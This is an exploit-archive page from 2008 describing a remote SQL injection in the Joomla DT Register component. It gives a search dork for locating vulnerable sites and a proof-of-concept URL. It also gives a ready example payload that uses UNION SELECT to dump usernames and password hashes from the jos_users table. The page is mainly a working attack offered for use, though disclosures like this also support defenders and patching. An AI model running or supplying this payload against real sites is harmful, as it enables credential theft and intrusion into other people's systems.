[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component DT Register Remote SQL injection Vulnerability
# Published : 2008-07-16
# Author : His0k4
# Previous Title : PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
# Next Title : AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability


/---------------------------------------------------------------
                                				/
/       Joomla Component DT Register Remote SQL injection       
                                				/
---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkeR]

[*] Dork      :  inurl:com_DTRegister eventId

[*] Vendor    :  http://www.dthdevelopment.com/components/dt-register.html

[*] POC        : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}

[*] Example    : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138

[*] Greetings  : All friends & muslims HaCkeRs
                 www.dz-secure.com
          
----------------------------------------------------------------------------

# www.Syue.com [2008-07-16]